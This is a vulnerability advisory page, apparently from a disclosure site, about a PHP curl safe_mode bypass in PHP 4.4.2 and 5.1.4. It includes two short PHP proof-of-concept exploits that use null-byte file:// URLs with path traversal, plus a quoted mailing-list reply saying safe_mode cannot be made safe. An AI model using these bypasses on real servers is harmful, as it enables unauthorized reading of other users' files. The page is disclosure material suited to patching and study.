|
Brought to you by:
Suppliers of:
|
|
|
| |
PHP is "an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now".
Vulnerability in PHP's curl library allows remote attackers to bypass PHP's safe mode. |
| |
Credit:
The information has been provided by Maksymilian Arciemowicz.
|
| |
Vulnerable Systems:
* PHP versions 4.4.2 and 5.1.4
PHP supports libcurl, a library created by Daniel Stenberg. libcurl allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the HTTP, HTTPS, FTP, Gopher, telnet, dict, file, and LDAP protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's FTP extension), HTTP form based upload, proxies, cookies, and user+password authentication. These functions have been added in PHP 4.0.2.
A general problem exists in cURL functions, due to the fact that when safe_mode is enabled, strings 0 (\x00) are change to "_". When this is combined with libcurl's processing of URLs that have the prefix of file://, as safe_mode only checks the path section of the file:/// URL.
Example:
-Safe_Mode bypass exploit.1---
<?
$ch = curl_init("file://filethatyoudonthaveaccessto.php\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
-Safe_Mode bypass exploit.1---
Safe_mode will only check the content of __FILE__, whereas cURL will include the filethatyoudonthaveaccessto.php part of the file in its request. Therefore, you can include any files from directory where script is. But in this exploit, you can only read files from directory where this script is (You can't use "/").
Similarly, if you have an access to a directory you can use the vulnerability to access files that are outside the directory you have access to:
If you want to access "fileFROManotherUSER.php" (under another directory), all you need to do is create a directory called "fileFROManotherUSER.php_" under your directory (note the _):
"/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/":
And then use this exploit:
-Safe_Mode bypass exploit.2---
<?
$ch = curl_init("file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
-Safe_Mode bypass exploit.2---
As again, safe_mode only checks whether you have access to the file:
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../YourFile.php"
While cURL will access this file:
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php"
Due is due to the fact that there is an \x00 at the end of the URL.
Fix:
Download latest CVS version of curl library:
http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/
|
| Subject:
|
Just a side note |
Date: |
1 Jun. 2006 |
| From: |
kanedablacksecurity.org |
[Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities
Stefan Esser sesser at php.net
Tue Oct 18 22:54:46 BST 2005
* Previous message: [Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities
* Next message: [Full-disclosure] MDKSA-2005:186 - Updated lynx packages fix remote buffer overflow
* Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello,
> In reguads to the the curl, I have just checked all the php curl code
> this was fixed in 4.3.10 from what i can see, because i wrote a patch
> to stop the openbase dir in curl until php fixed it, i submited it
> along time ago but the php dev's were all "e;blah blah blah 3rd party
> software blah blah not our problem"e;
Just because you close one (more) file:// hole with a patch, you do not
solve the 3rd party library problem. As long you have CURL compiled with
file:// support you can bypass safe_mode/open basedir in PHP. There are
enough hidden features in libcurl that allow to feed it with file://
URLs without PHP ever knowing about it.
Just face it safe_mode is not safe, was never and will never be. It is
simply impossible for an application to put access control restrictions
over (hidden) features of 3rd party libraries, that are not exported.
And with PHP6 safe_mode, register_globals and all the crap will most
probably disappear.
Stefan
--
--------------------------------------------------------------------------
Stefan Esser sesser at php.net
Hardened-PHP Project http://www.hardened-php.net/
GPG-Key gpg --keyserver pgp.mit.edu --recv-key 0x15ABDA78
Key fingerprint 7806 58C8 CFA8 CE4A 1C2C 57DD 4AE1 795E 15AB DA78
--------------------------------------------------------------------------
|
|
| Subject:
|
i think |
Date: |
9 Mar. 2008 |
| From: |
matrixmr.brantook.vbsangel_matrix2003yahoo.com |
| thnx man i think the exploit of 5.2.5 its smalir to thes one |
|
|
|
|
|
|
